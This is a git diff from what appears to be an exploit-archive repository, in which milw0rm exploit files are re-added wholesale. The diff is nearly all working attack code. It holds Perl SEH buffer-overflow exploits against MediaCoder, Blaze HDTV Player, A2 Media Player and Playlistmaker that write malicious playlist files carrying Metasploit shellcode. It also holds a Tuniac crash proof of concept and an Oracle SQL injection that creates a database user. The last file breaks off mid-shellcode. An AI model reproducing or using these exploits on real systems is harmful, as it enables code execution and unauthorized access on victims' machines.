-// milw0rm.com [2005-04-13]
+END;
+
+// milw0rm.com [2005-04-13]
diff --git a/platforms/windows/local/933.sql b/platforms/windows/local/933.sql
index d1c7b61dd..85fa6cdb3 100755
--- a/platforms/windows/local/933.sql
+++ b/platforms/windows/local/933.sql
@@ -280,6 +280,6 @@ GRANT EXECUTE ON "SYS"."SQLIVULN_CUR_USR" TO "SCOTT"
 -- To Exploit the attacker could execute:
 EXEC SYS.SQLIVULN('MANAGER''||SYS.SQLIVULN_CUR_USR(''AA''''; execute immediate
 ''''declare pragma autonomous_transaction; begin execute immediate ''''''''create
-user eric identified by newpsw''''''''; commit; end;''''; end;--'')||''');
-
--- milw0rm.com [2005-04-13]
+user eric identified by newpsw''''''''; commit; end;''''; end;--'')||''');
+
+-- milw0rm.com [2005-04-13]
diff --git a/platforms/windows/local/9343.pl b/platforms/windows/local/9343.pl
index 5e407022b..60fc07957 100755
--- a/platforms/windows/local/9343.pl
+++ b/platforms/windows/local/9343.pl
@@ -1,50 +1,50 @@
-#!/usr/bin/perl
-# MediaCoder 0.6.2.4275 .lst Stack Based Overflow > # Discovered by :[ SKULL-HACKER ]
-my $header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x46\x69\x6C\x65\x31\x3D";
-my $junk  = "\x41" x 254;
-my $ret   = "\x93\x43\x92\x7c"; #
-my $nop   = "\x90" x 25;
-# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
-my $calc_shell =
-    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
-    "\x42\x50\x42\x50\x42\x30\x4b\x48\x45\x34\x4e\x43\x4b\x38\x4e\x47".
-    "\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48".
-    "\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x34\x4b\x48\x46\x53\x4b\x48".
-    "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c".
-    "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
-    "\x46\x4f\x4b\x53\x46\x55\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x38".
-    "\x4f\x45\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54".
-    "\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58".
-    "\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x30\x43\x4c\x41\x43".
-    "\x42\x4c\x46\x36\x4b\x58\x42\x34\x42\x33\x45\x48\x42\x4c\x4a\x57".
-    "\x4e\x30\x4b\x48\x42\x44\x4e\x30\x4b\x48\x42\x47\x4e\x41\x4d\x4a".
-    "\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b".
-    "\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x45\x41\x33".
-    "\x48\x4f\x42\x36\x48\x45\x49\x48\x4a\x4f\x43\x38\x42\x4c\x4b\x47".
-    "\x42\x55\x4a\x46\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x36\x4a\x39".
-    "\x50\x4f\x4c\x38\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x36".
-    "\x4e\x56\x43\x36\x50\x32\x45\x36\x4a\x57\x45\x56\x42\x30\x5a";
- 
-print $header.$junk.$ret.$nop.$calc_shell.$nop;
- 
-# > ## Author :
-# > SkuLL-HacKeR  
-# > [»] Home : WwW.Sec-ArT.CoM/cc
-# >   
-# > [»] GreetZ : ~~>: hack4love - ASER ELRO7 - str0ke : ,
-# > milw0rm.com  
-# > [»] Special Thx : Of all Moroccans : Simo-soft - djekmani4ever - jadi
-# > chel7 ]  
-# > [»] Contact MSN: Wizard-skh[at]HoTmaiL[Dot]CoM /
-# > SkuLL--HacKeR[at]hotmail.CoM
- 
- 
-# > | Sec-ArT.com :) _/
- 
-# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #  
-
-# milw0rm.com [2009-08-03]
+#!/usr/bin/perl
+# MediaCoder 0.6.2.4275 .lst Stack Based Overflow > # Discovered by :[ SKULL-HACKER ]
+my $header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x46\x69\x6C\x65\x31\x3D";
+my $junk  = "\x41" x 254;
+my $ret   = "\x93\x43\x92\x7c"; #
+my $nop   = "\x90" x 25;
+# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
+my $calc_shell =
+    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
+    "\x42\x50\x42\x50\x42\x30\x4b\x48\x45\x34\x4e\x43\x4b\x38\x4e\x47".
+    "\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48".
+    "\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x34\x4b\x48\x46\x53\x4b\x48".
+    "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c".
+    "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
+    "\x46\x4f\x4b\x53\x46\x55\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x38".
+    "\x4f\x45\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54".
+    "\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58".
+    "\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x30\x43\x4c\x41\x43".
+    "\x42\x4c\x46\x36\x4b\x58\x42\x34\x42\x33\x45\x48\x42\x4c\x4a\x57".
+    "\x4e\x30\x4b\x48\x42\x44\x4e\x30\x4b\x48\x42\x47\x4e\x41\x4d\x4a".
+    "\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b".
+    "\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x45\x41\x33".
+    "\x48\x4f\x42\x36\x48\x45\x49\x48\x4a\x4f\x43\x38\x42\x4c\x4b\x47".
+    "\x42\x55\x4a\x46\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x36\x4a\x39".
+    "\x50\x4f\x4c\x38\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x36".
+    "\x4e\x56\x43\x36\x50\x32\x45\x36\x4a\x57\x45\x56\x42\x30\x5a";
+ 
+print $header.$junk.$ret.$nop.$calc_shell.$nop;
+ 
+# > ## Author :
+# > SkuLL-HacKeR  
+# > [»] Home : WwW.Sec-ArT.CoM/cc
+# >   
+# > [»] GreetZ : ~~>: hack4love - ASER ELRO7 - str0ke : ,
+# > milw0rm.com  
+# > [»] Special Thx : Of all Moroccans : Simo-soft - djekmani4ever - jadi
+# > chel7 ]  
+# > [»] Contact MSN: Wizard-skh[at]HoTmaiL[Dot]CoM /
+# > SkuLL--HacKeR[at]hotmail.CoM
+ 
+ 
+# > | Sec-ArT.com :) _/
+ 
+# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #  
+
+# milw0rm.com [2009-08-03]
diff --git a/platforms/windows/local/9346.pl b/platforms/windows/local/9346.pl
index db767c43d..e2b8ee672 100755
--- a/platforms/windows/local/9346.pl
+++ b/platforms/windows/local/9346.pl
@@ -1,44 +1,44 @@
-#!/usr/bin/perl
-# by hack4love
-# hack4love@hotmail.com
-# Blaze HDTV Player 6.0 (.PLF File) Local Buffer Overflow Exploit (SEH)
-# ## easy ##
-###Thanks for SkuLL-HacKeR ####and all WwW.Sec-ArT.CoM/cc team
-##AND special THANKS FOR EL7ADRANY ##AND 3ASFH TEAM##
-## this work sooooooooo good
-## Tested on: Windows XP Pro SP2 (EN)
-##################################################################
-my $bof="\x41" x 608;
-my $nsh="\xEB\x06\x90\x90";
-my $seh="\xb8\x15\xd1\x72";
-my $nop="\x90" x 20;
-my $sec=
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
-"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
-"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
-"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
-"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
-"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
-"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
-"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
-"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
-"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
-"\x4e\x56\x43\x46\x42\x30\x5a";
-print $bof.$nsh.$seh.$nop.$sec;
-###################################################################
-open(myfile,'>> HACK4LOVE.PLF');
-print myfile $bof.$nsh.$seh.$nop.$sec;
-###################################################################
-
-# milw0rm.com [2009-08-03]
+#!/usr/bin/perl
+# by hack4love
+# hack4love@hotmail.com
+# Blaze HDTV Player 6.0 (.PLF File) Local Buffer Overflow Exploit (SEH)
+# ## easy ##
+###Thanks for SkuLL-HacKeR ####and all WwW.Sec-ArT.CoM/cc team
+##AND special THANKS FOR EL7ADRANY ##AND 3ASFH TEAM##
+## this work sooooooooo good
+## Tested on: Windows XP Pro SP2 (EN)
+##################################################################
+my $bof="\x41" x 608;
+my $nsh="\xEB\x06\x90\x90";
+my $seh="\xb8\x15\xd1\x72";
+my $nop="\x90" x 20;
+my $sec=
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
+"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
+"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
+"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
+"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
+"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
+"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
+"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
+"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
+"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
+"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
+"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
+"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
+"\x4e\x56\x43\x46\x42\x30\x5a";
+print $bof.$nsh.$seh.$nop.$sec;
+###################################################################
+open(myfile,'>> HACK4LOVE.PLF');
+print myfile $bof.$nsh.$seh.$nop.$sec;
+###################################################################
+
+# milw0rm.com [2009-08-03]
diff --git a/platforms/windows/local/935.c b/platforms/windows/local/935.c
index bcf56d1d8..c3dc57173 100755
--- a/platforms/windows/local/935.c
+++ b/platforms/windows/local/935.c
@@ -153,6 +153,6 @@ printf("Altnick : %s\n",AltNick);
 printf("Password : %s\n",Password);
 
 return 0;
-} 
-
-// milw0rm.com [2005-04-13]
+} 
+
+// milw0rm.com [2005-04-13]
diff --git a/platforms/windows/local/9354.pl b/platforms/windows/local/9354.pl
index 786542324..6abca056c 100755
--- a/platforms/windows/local/9354.pl
+++ b/platforms/windows/local/9354.pl
@@ -1,28 +1,28 @@
-#!/usr/bin/perl
-#[+] Bug : MediaCoder 0.7.1.4486 (.lst) Universal Buffer overflow (SEH)
-#[+] Author : germaya_x
-#[+] Greetz : hack4love
-#[+] tested on: sp3 (EN)
-##########################################################
- 
-# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
-my $shellcode =
-"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38".
-"\x78\x73\x8a\x83\xeb\xfc\xe2\xf4\xc4\x90\x37\x8a\x38\x78\xf8\xcf".
-"\x04\xf3\x0f\x8f\x40\x79\x9c\x01\x77\x60\xf8\xd5\x18\x79\x98\xc3".
-"\xb3\x4c\xf8\x8b\xd6\x49\xb3\x13\x94\xfc\xb3\xfe\x3f\xb9\xb9\x87".
-"\x39\xba\x98\x7e\x03\x2c\x57\x8e\x4d\x9d\xf8\xd5\x1c\x79\x98\xec".
-"\xb3\x74\x38\x01\x67\x64\x72\x61\xb3\x64\xf8\x8b\xd3\xf1\x2f\xae".
-"\x3c\xbb\x42\x4a\x5c\xf3\x33\xba\xbd\xb8\x0b\x86\xb3\x38\x7f\x01".
-"\x48\x64\xde\x01\x50\x70\x98\x83\xb3\xf8\xc3\x8a\x38\x78\xf8\xe2".
-"\x04\x27\x42\x7c\x58\x2e\xfa\x72\xbb\xb8\x08\xda\x50\x88\xf9\x8e".
-"\x67\x10\xeb\x74\xb2\x76\x24\x75\xdf\x1b\x12\xe6\x5b\x78\x73\x8a";
-
-my $junk="\x41" x 768;
-my $next_seh="\x87\x51\x37\x00"; # jmp esp in sdl.dll
-my $seh="\x31\x66\x66\x31"; # pop pop ret->mediacoder.exe
-
-open(myfile,'>>exploit.lst');
-print myfile $junk.$next_seh.$seh.$shellcode;
-
-# milw0rm.com [2009-08-04]
+#!/usr/bin/perl
+#[+] Bug : MediaCoder 0.7.1.4486 (.lst) Universal Buffer overflow (SEH)
+#[+] Author : germaya_x
+#[+] Greetz : hack4love
+#[+] tested on: sp3 (EN)
+##########################################################
+ 
+# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
+my $shellcode =
+"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38".
+"\x78\x73\x8a\x83\xeb\xfc\xe2\xf4\xc4\x90\x37\x8a\x38\x78\xf8\xcf".
+"\x04\xf3\x0f\x8f\x40\x79\x9c\x01\x77\x60\xf8\xd5\x18\x79\x98\xc3".
+"\xb3\x4c\xf8\x8b\xd6\x49\xb3\x13\x94\xfc\xb3\xfe\x3f\xb9\xb9\x87".
+"\x39\xba\x98\x7e\x03\x2c\x57\x8e\x4d\x9d\xf8\xd5\x1c\x79\x98\xec".
+"\xb3\x74\x38\x01\x67\x64\x72\x61\xb3\x64\xf8\x8b\xd3\xf1\x2f\xae".
+"\x3c\xbb\x42\x4a\x5c\xf3\x33\xba\xbd\xb8\x0b\x86\xb3\x38\x7f\x01".
+"\x48\x64\xde\x01\x50\x70\x98\x83\xb3\xf8\xc3\x8a\x38\x78\xf8\xe2".
+"\x04\x27\x42\x7c\x58\x2e\xfa\x72\xbb\xb8\x08\xda\x50\x88\xf9\x8e".
+"\x67\x10\xeb\x74\xb2\x76\x24\x75\xdf\x1b\x12\xe6\x5b\x78\x73\x8a";
+
+my $junk="\x41" x 768;
+my $next_seh="\x87\x51\x37\x00"; # jmp esp in sdl.dll
+my $seh="\x31\x66\x66\x31"; # pop pop ret->mediacoder.exe
+
+open(myfile,'>>exploit.lst');
+print myfile $junk.$next_seh.$seh.$shellcode;
+
+# milw0rm.com [2009-08-04]
diff --git a/platforms/windows/local/936.c b/platforms/windows/local/936.c
index d10ef6741..9e23a8462 100755
--- a/platforms/windows/local/936.c
+++ b/platforms/windows/local/936.c
@@ -155,6 +155,6 @@ printf("Ftp Username : %s\n",FtpUsername);
 printf("Ftp Password : %s\n",FtpPassword);
 
 return 0;
-}
-
-// milw0rm.com [2005-04-13]
+}
+
+// milw0rm.com [2005-04-13]
diff --git a/platforms/windows/local/9364.py b/platforms/windows/local/9364.py
index 89606380a..62d8298d4 100755
--- a/platforms/windows/local/9364.py
+++ b/platforms/windows/local/9364.py
@@ -1,19 +1,19 @@
-#!/usr/bin/env python
-
-##############################################################################################
-#
-# Tuniac v.090517c (.M3U) Crash PoC
-# Found By: Dr_IDE
-# http://sourceforge.net/projects/tuniac/files/tuniac/090517/Tuniac_Setup_090517c.exe/download
-# Notes: Not sure if code execution is possible though. Maybe someone else can finish it off.
-#
-##############################################################################################
-
-# Play around here, anything seems to knock it out.
-buffer = ("http://" + "\x41" * (4444));
-
-f = open('Dr_IDE.M3U','w');
-f.write(buffer);
-f.close();
-
-# milw0rm.com [2009-08-05]
+#!/usr/bin/env python
+
+##############################################################################################
+#
+# Tuniac v.090517c (.M3U) Crash PoC
+# Found By: Dr_IDE
+# http://sourceforge.net/projects/tuniac/files/tuniac/090517/Tuniac_Setup_090517c.exe/download
+# Notes: Not sure if code execution is possible though. Maybe someone else can finish it off.
+#
+##############################################################################################
+
+# Play around here, anything seems to knock it out.
+buffer = ("http://" + "\x41" * (4444));
+
+f = open('Dr_IDE.M3U','w');
+f.write(buffer);
+f.close();
+
+# milw0rm.com [2009-08-05]
diff --git a/platforms/windows/local/937.c b/platforms/windows/local/937.c
index 7883b433e..87355793a 100755
--- a/platforms/windows/local/937.c
+++ b/platforms/windows/local/937.c
@@ -154,6 +154,6 @@ printf("Proxy Username : %s\n",Username);
 printf("Proxy Password : %s\n",Password);
 
 return 0;
-} 
-
-// milw0rm.com [2005-04-13]
+} 
+
+// milw0rm.com [2005-04-13]
diff --git a/platforms/windows/local/9377.pl b/platforms/windows/local/9377.pl
index 4d8ce1db0..814756bdd 100755
--- a/platforms/windows/local/9377.pl
+++ b/platforms/windows/local/9377.pl
@@ -1,45 +1,45 @@
-#!/usr/bin/perl
-# by hack4love
-# hack4love@hotmail.com
-# A2 Media Player ProV2.51(.m3u /m3l)Universal Local Buffer Exploit (SEH)
-# ## easy #### this work sooooooooo good####################################
-############################################################################
-##Thanks for WwW.Sec-ArT.CoM/cc team ##and 3asfh.net team###################
-##AND special THANKS FOR His0k4 i respect him so much god with him #########
-############################################################################
-# http://download.cnet.com/A2-Media-Player-Pro/3000-2141_4-10059847.html
-############################################################################
-my $bof="\x41" x 4103;
-my $nsh="\xEB\x06\x90\x90";
-my $seh="\x47\xa1\x01\x10";##Universal
-my $nop="\x90" x 20;
-my $sec=
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
-"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
-"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
-"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
-"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
-"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
-"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
-"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
-"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
-"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
-"\x4e\x56\x43\x46\x42\x30\x5a";
-print $bof.$nsh.$seh.$nop.$sec;
-###################################################################
-open(myfile,'>> HACK4LOVE.m3u');
-print myfile $bof.$nsh.$seh.$nop.$sec;
-###################################################################
-
-# milw0rm.com [2009-08-06]
+#!/usr/bin/perl
+# by hack4love
+# hack4love@hotmail.com
+# A2 Media Player ProV2.51(.m3u /m3l)Universal Local Buffer Exploit (SEH)
+# ## easy #### this work sooooooooo good####################################
+############################################################################
+##Thanks for WwW.Sec-ArT.CoM/cc team ##and 3asfh.net team###################
+##AND special THANKS FOR His0k4 i respect him so much god with him #########
+############################################################################
+# http://download.cnet.com/A2-Media-Player-Pro/3000-2141_4-10059847.html
+############################################################################
+my $bof="\x41" x 4103;
+my $nsh="\xEB\x06\x90\x90";
+my $seh="\x47\xa1\x01\x10";##Universal
+my $nop="\x90" x 20;
+my $sec=
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
+"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
+"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
+"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
+"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
+"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
+"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
+"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
+"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
+"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
+"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
+"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
+"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
+"\x4e\x56\x43\x46\x42\x30\x5a";
+print $bof.$nsh.$seh.$nop.$sec;
+###################################################################
+open(myfile,'>> HACK4LOVE.m3u');
+print myfile $bof.$nsh.$seh.$nop.$sec;
+###################################################################
+
+# milw0rm.com [2009-08-06]
diff --git a/platforms/windows/local/9379.pl b/platforms/windows/local/9379.pl
index 457bd5252..06b0519ee 100755
--- a/platforms/windows/local/9379.pl
+++ b/platforms/windows/local/9379.pl
@@ -1,31 +1,31 @@
-#!/usr/bin/perl
-#discoverd by:  germaya_x
-#soft:Playlistmaker1.5 (m3l,m3u files) local buffer overflow exploit (SEH)
-#Download: http://proletsoft.freeservers.com/mmb/playlistmaker.html
-#tested on: xp sp3 (EN)
-#bug date:August 06 09
-#greetz:hack4love ,devil fucker ,angel
-###############################################################################################
-# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
-my $shellcode =
-"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38".
-"\x78\x73\x8a\x83\xeb\xfc\xe2\xf4\xc4\x90\x37\x8a\x38\x78\xf8\xcf".
-"\x04\xf3\x0f\x8f\x40\x79\x9c\x01\x77\x60\xf8\xd5\x18\x79\x98\xc3".
-"\xb3\x4c\xf8\x8b\xd6\x49\xb3\x13\x94\xfc\xb3\xfe\x3f\xb9\xb9\x87".
-"\x39\xba\x98\x7e\x03\x2c\x57\x8e\x4d\x9d\xf8\xd5\x1c\x79\x98\xec".
-"\xb3\x74\x38\x01\x67\x64\x72\x61\xb3\x64\xf8\x8b\xd3\xf1\x2f\xae".
-"\x3c\xbb\x42\x4a\x5c\xf3\x33\xba\xbd\xb8\x0b\x86\xb3\x38\x7f\x01".
